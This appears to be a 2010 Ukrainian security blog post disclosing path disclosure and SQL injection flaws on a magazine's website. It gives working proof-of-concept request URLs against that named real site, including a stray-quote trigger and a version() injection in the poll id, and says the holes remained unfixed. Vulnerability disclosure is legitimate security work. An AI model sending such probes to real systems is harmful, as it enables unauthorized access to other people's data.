« Добірка експлоітів
Похакані сайти №92 »

Уразливості на chip.ua

19:20 14.04.2010

15.01.2008

У червні, 16.06.2007, я знайшов Full path disclosure і SQL Injection уразливості на http://chip.ua - сайті журнала Chip. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

14.04.2010

Full path disclosure:

http://chip.ua/?page=ce_ar&p=-1

http://chip.ua/?page=poll&id=’

SQL Injection:

http://chip.ua/?page=poll&id=39%20and%20version()%3E=5

Дані уразливості досі не виправлені. Причому, якщо шляхи на сервері та версію MySQL вони змінили за цей час, то дірки вони так і не виправили.


This entry was posted on 19:20 14.04.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.